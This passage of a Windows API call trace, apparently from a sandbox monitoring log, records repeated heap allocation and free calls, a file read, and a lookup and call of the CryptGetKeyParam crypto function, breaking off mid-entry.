1 [0173.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0173.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.029] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.029] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0173.030] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.030] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.030] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0173.030] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x9ec8, lpOverlapped=0x0) returned 1 [0173.033] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0173.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0173.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0173.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.034] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.034] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.034] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.034] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.034] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.035] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.035] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.035] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.035] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.035] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0173.036] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0173.036] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0173.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0173.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d420 [0173.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.038] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0173.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0173.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0173.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0173.039] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c27a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: 